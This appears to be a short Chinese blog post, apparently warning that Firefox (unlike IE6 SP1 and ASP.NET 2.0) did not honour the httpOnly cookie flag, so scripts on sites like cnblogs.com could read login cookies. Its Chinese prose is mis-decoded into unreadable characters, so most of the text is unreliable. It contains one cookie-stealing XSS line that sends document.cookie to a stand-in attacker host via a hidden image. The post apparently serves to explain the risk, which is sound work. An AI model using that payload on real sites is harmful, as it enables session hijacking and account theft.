×Ô´ÓIE6 SP1Æð , Õâ¸öä¯ÀÀÆ÷¾ÍÖ§³ÖcookieµÄhttpOnlyÊôÐÔ.
Õâ¸öÊôÐÔ, ¸æËßä¯ÀÀÆ÷, ʹÓà window.document.cookie ²»ÔÊÐí·ÃÎʸÃcookie .
¶øÔÚASP.NET2.0ÖÐ , Õâ¸öÊôÐÔÒ²µÃµ½ÁËÖ§³Ö, ²¢ÇÒÔÚFormAuthenticationÖÐÖ¸¶¨¸ÃÊôÐÔ.
µ«ÊÇ,FireFoxµÈä¯ÀÀÆ÷, ²¢²»Ö§³Ö¸ÃÊôÐÔ. ÄÇôÕâ¸ö´øÀ´Ê²Ã´ºó¹û?
ÀýÈç , ¼ÙÈçÄãÓÃFireFoxµÇ¼²©¿ÍÔ°(www.cnblogs.com
), È»ºóµ½Ò»¸ö¶ñÒâµÄÓû§µÄÎÄÕÂÈ¥.
ÄãÖªµÀcnblogs.comÔÊÐíÓû§ËæÒâÔö¼ÓjavascriptµÄ.
ÄÇô¸ÃÓû§¾ÍÄܵõ½ÄãµÄcookie,È»ºóÓÃÒ»¸ö¼òµ¥µÄ·½·¨,°ÑÄãµÄcookie·¢Ë͵½ËûµÄÊý¾Ý¿âÈ¥:
hiddenImg.src="http://hackyourlogininfo.com/savecookie.aspx?cookie="+escape(document.cookie)
µ±È»,ASP.NET·¢Ë͸ø¿Í»§¶ËµÄÐÅÏ¢ÊǼÓÃܹýµÄ.
µ«ÊDZðÈË¿ÉÒÔÖ±½Óͨ¹ýαÔìCOOKIE,Ö±½ÓʹÓøÃcookie,ÒÔÄãµÄÉí·ÝµÇ¼²©¿ÍÔ°.
ËùÒÔ - ÓÃFireFoxµÇ¼²©¿ÍÔ°ÀàËƵÄÍøÕ¾, ÄãµÄÕÊ»§ÐÅÏ¢Ëæʱ»á±»µÁ.
µ«ÊÇÈç¹ûʹÓÃIE6SP1,IE7,¾Í²»»á´æÔÚ¸ÃÎÊÌâ.
ÒòΪËüÖ§³ÖhttpOnly,ËùÒÔʹÓÃdocument.cookie²¢²»ÄÜÈ¡µÃASP.NETµÄµÇ¼ÐÅÏ¢.
